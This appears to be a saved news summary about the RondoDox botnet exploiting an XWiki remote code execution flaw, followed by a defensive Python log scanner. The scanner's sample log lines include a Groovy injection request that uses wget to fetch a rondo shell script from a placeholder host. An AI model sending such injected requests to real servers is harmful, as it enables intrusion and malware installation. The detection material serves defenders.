Saved February 14, 2026
Do you care about this?
The RondoDox botnet is exploiting a critical RCE vulnerability in XWiki, tracked as CVE-2025-24893. CISA has flagged this flaw as actively exploited, with RondoDox using it to execute malicious payloads on affected servers. Immediate patching is recommended for vulnerable versions.
If you do, here's more
The RondoDox botnet malware is now exploiting a serious remote code execution vulnerability in the XWiki Platform, identified as CVE-2025-24893. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) flagged this flaw as actively exploited on October 30. According to VulnCheck, multiple threat actors, including RondoDox operators and cryptocurrency miners, are leveraging this vulnerability in their attacks. RondoDox, first identified by Fortinet in July 2025, has rapidly expanded its reach, targeting at least 30 devices using 56 known vulnerabilities.
Starting November 3, VulnCheck noted that RondoDox was exploiting CVE-2025-24893 through crafted HTTP GET requests that injected malicious Groovy code via the XWiki SolrSearch endpoint. This injection led to the server downloading a remote shell payload. The initial script, named rondo.<value>.sh, acts as a downloader for the main RondoDox payload. Further activity included cryptocurrency mining deployments and attempts to establish reverse shells on various dates, including October 31 and November 11.
The vulnerability affects XWiki versions prior to 15.10.11 and 16.4.1; administrators running those versions should patch immediately. Just days after exploitation of the flaw began, researchers observed multiple attackers leveraging it. The incidents were linked to specific user agents and documented payload servers associated with the RondoDox botnet, suggesting that these known indicators of compromise could help detect and block further exploitation attempts.
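The exploitation pattern described above (Groovy injected through the SolrSearch endpoint, followed by a rondo.&lt;value&gt;.sh downloader) can be hunted for in web-server access logs. The following is an added example written for this summary, not code from VulnCheck, Fortinet or the XWiki project; it assumes the Apache/nginx "combined" log format, assumes the SolrSearch page is served under a path ending in `/SolrSearch` (such as `/xwiki/bin/get/Main/SolrSearch`), and runs over constructed sample lines.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache/nginx "combined" access-log format (assumed; adjust for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Heuristics taken from the write-up: Groovy reaching the SolrSearch endpoint,
# and a first-stage downloader named rondo.<value>.sh.
SOLR_SEARCH = re.compile(r'/SolrSearch$', re.I)      # request path ends in the SolrSearch page
GROOVY = re.compile(r'groovy', re.I)
MACRO_SYNTAX = re.compile(r'\{\{')                    # assumption: wiki macro syntax never belongs in a search term
DOWNLOADER = re.compile(r'rondo\.[^\s/]+\.sh', re.I)  # rondo.<value>.sh, the page's placeholder name

def classify(line: str):
    """Return a finding dict for a suspicious SolrSearch request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m['target'])
    if not SOLR_SEARCH.search(parts.path):
        return None
    # Decode twice: double URL-encoding is a common way to slip past naive filters.
    query = unquote_plus(unquote_plus(parts.query))
    checks = (('groovy-in-query', GROOVY),
              ('macro-syntax-in-query', MACRO_SYNTAX),
              ('rondodox-downloader-name', DOWNLOADER))
    reasons = [name for name, rx in checks if rx.search(query)]
    if not reasons:
        return None
    return {'ip': m['ip'], 'time': m['ts'], 'status': m['status'], 'ua': m['ua'], 'reasons': reasons}

def scan(lines):
    """Run classify() over an iterable of log lines and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (not real traffic; 203.0.113.0/24 is documentation address space).
SAMPLE_LOG = [
    '203.0.113.10 - - [03/Nov/2025:10:01:07 +0000] "GET /xwiki/bin/get/Main/SolrSearch?text=release+notes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [03/Nov/2025:10:02:19 +0000] "GET /xwiki/bin/get/Main/SolrSearch?text=%257B%257Bgroovy%257D%257DCONSTRUCTED_PAYLOAD%257B%257B%252Fgroovy%257D%257D HTTP/1.1" 200 812 "-" "curl/8.5.0"',
    '203.0.113.30 - - [03/Nov/2025:10:03:44 +0000] "GET /xwiki/bin/get/Main/SolrSearch?text=%7B%7Bgroovy%7D%7Dwget+http%3A%2F%2F203.0.113.99%2Frondo.EXAMPLE.sh%7B%7B%2Fgroovy%7D%7D HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.40 - - [03/Nov/2025:10:04:02 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} ua={f['ua']!r} -> {', '.join(f['reasons'])}")
```

A hit on a 200-status request is the case to escalate, since the summary notes the injection led to the server fetching the downloader; pair the finding with outbound-connection logs from the XWiki host to confirm.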